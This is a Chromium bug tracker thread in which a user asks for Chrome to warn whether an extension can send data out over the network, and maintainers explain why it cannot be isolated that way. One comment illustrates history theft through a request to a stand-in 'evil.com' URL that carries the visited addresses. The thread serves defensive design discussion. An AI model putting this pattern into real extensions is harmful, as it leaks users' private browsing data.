RFE: tell user if it's (im)possible for an extension to leak/steal info across the network
Reported by
khym.cha...@gmail.com,
Jul 4 2017
|
||||
Issue descriptionUserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36 Steps to reproduce the problem: 1. User clicks "install" for an extension What is the expected behavior? Chrome tells user if the extension's combination of permissions makes it possible or impossible for the extension to leak information out over the network. What went wrong? The user has to determine this own their own. WebStore page: Did this work before? No Chrome version: 59.0.3071.115 Channel: stable OS Version: Flash Version: Shockwave Flash 26.0 r0 If there's an extension which (for example) has permission to look at the user's history, but *only* has that one permission, then that extension isn't going to be able to send the user's history to anyone over the network since the extension can't use WebRTC, do anything with sockets, or modify the HTML of any pages to send info for the extension. If users were made aware that for certain extensions any info the extension gets is "trapped" on the user's computer, then they'd be more willing to trust and install those extensions.
,
Jul 5 2017
An extension that can see your history could request a resource "https://evil.com/?url1&url2&url3&..." to report your history to a cooperating server. It's cross-origin, so you can only fetch with an opaque response, but that's not interesting - the server already got the data. What we would need to achieve this goal is basically disallowing all network communication for a particular extension. Funnily enough, you can achieve that using another extension which blocks request through the WebRequest API. But as far as I know, it's currently not possible to disable this for an extension directly.
,
Jul 5 2017
,
Jul 6 2017
Oops. So should I make an RFE so that extensions have to explicitly request permission to fetch a resource?
,
Jul 6 2017
Marking this as untriaged as this is a feature request. Thanks!
,
Jul 6 2017
> Funnily enough, you can achieve that using another extension which blocks request through the WebRequest API. But as far as I know, it's currently not possible to disable this for an extension directly. Extensions cannot see requests from other extensions, ever since bug 510802 was fixed. Extension pages (e.g. an extension's background page) are local web pages with privileges. Web pages can already trigger resource requests, e.g. by embedding an image or opening a new tab, so extensions without any permissions can do the same.
,
Jul 29 2017
I've made a new RFE ( issue 750418 ) to add extension permissions to make it possible to completely isolate an extension from the network.
,
Sep 15 2017
Think this can be closed as WontFix for reasons detailed at https://bugs.chromium.org/p/chromium/issues/detail?id=750418#c6 |
||||
►
Sign in to add a comment |
||||
Comment 1 by rhalavati@chromium.org
, Jul 5 2017